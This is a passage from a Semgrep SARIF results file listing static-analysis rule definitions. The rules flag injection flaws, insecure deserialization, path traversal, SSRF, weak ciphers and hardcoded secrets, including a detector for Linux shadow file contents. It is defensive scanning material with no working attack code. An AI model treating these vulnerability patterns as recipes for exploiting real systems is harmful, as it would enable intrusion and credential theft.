policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password","id":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","name":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-empty-password.pgx-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django","id":"python.django.deserialization.tainted-dill-django.tainted-dill-django","name":"python.django.deserialization.tainted-dill-django.tainted-dill-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-dill-django.tainted-dill-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors)\n - [https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin](https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors","id":"php.lang.security.php-permissive-cors.php-permissive-cors","name":"php.lang.security.php-permissive-cors.php-permissive-cors","properties":{"precision":"very-high","tags":["CWE-346: Origin Validation Error","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.php-permissive-cors.php-permissive-cors"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `sandbox`."},"help":{"markdown":"Make sure that unverified user data can not reach `sandbox`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Make sure that unverified user data can not reach `sandbox`."},"helpUri":"https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","id":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","name":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://sqlobject.org/SQLBuilder.html](https://sqlobject.org/SQLBuilder.html)\n - [https://sqlobject.org/SQLObject.html](https://sqlobject.org/SQLObject.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask","id":"python.flask.db.sqlobject-flask.sqlobject-flask","name":"python.flask.db.sqlobject-flask.sqlobject-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlobject-flask.sqlobject-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"help":{"markdown":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return)\n - [https://pkg.go.dev/sync#Mutex](https://pkg.go.dev/sync#Mutex)\n - [https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/](https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/)\n","text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"helpUri":"https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","id":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","name":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","properties":{"precision":"very-high","tags":["CWE-667: Improper Locking","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.missing-unlock-before-return.missing-unlock-before-return"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Generic Secret detected"},"help":{"markdown":"Generic Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Generic Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret","id":"generic.secrets.security.detected-generic-secret.detected-generic-secret","name":"generic.secrets.security.detected-generic-secret.detected-generic-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-generic-secret.detected-generic-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"help":{"markdown":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","id":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","name":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","id":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","name":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection","id":"javascript.phantom.security.audit.phantom-injection.phantom-injection","name":"javascript.phantom.security.audit.phantom-injection.phantom-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.phantom.security.audit.phantom-injection.phantom-injection"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","id":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","name":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","id":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","name":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"help":{"markdown":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","id":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","name":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","properties":{"precision":"very-high","tags":["CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal)\n - [https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values](https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"helpUri":"https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","id":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","name":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","id":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","name":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"linux shadow file detected"},"help":{"markdown":"linux shadow file detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"linux shadow file detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow","id":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","name":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-etc-shadow.detected-etc-shadow"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","id":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","name":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"CodeClimate detected"},"help":{"markdown":"CodeClimate detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"CodeClimate detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate","id":"generic.secrets.security.detected-codeclimate.detected-codeclimate","name":"generic.secrets.security.detected-codeclimate.detected-codeclimate","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-codeclimate.detected-codeclimate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"help":{"markdown":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"helpUri":"https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","id":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","name":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","id":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","name":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"help":{"markdown":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and 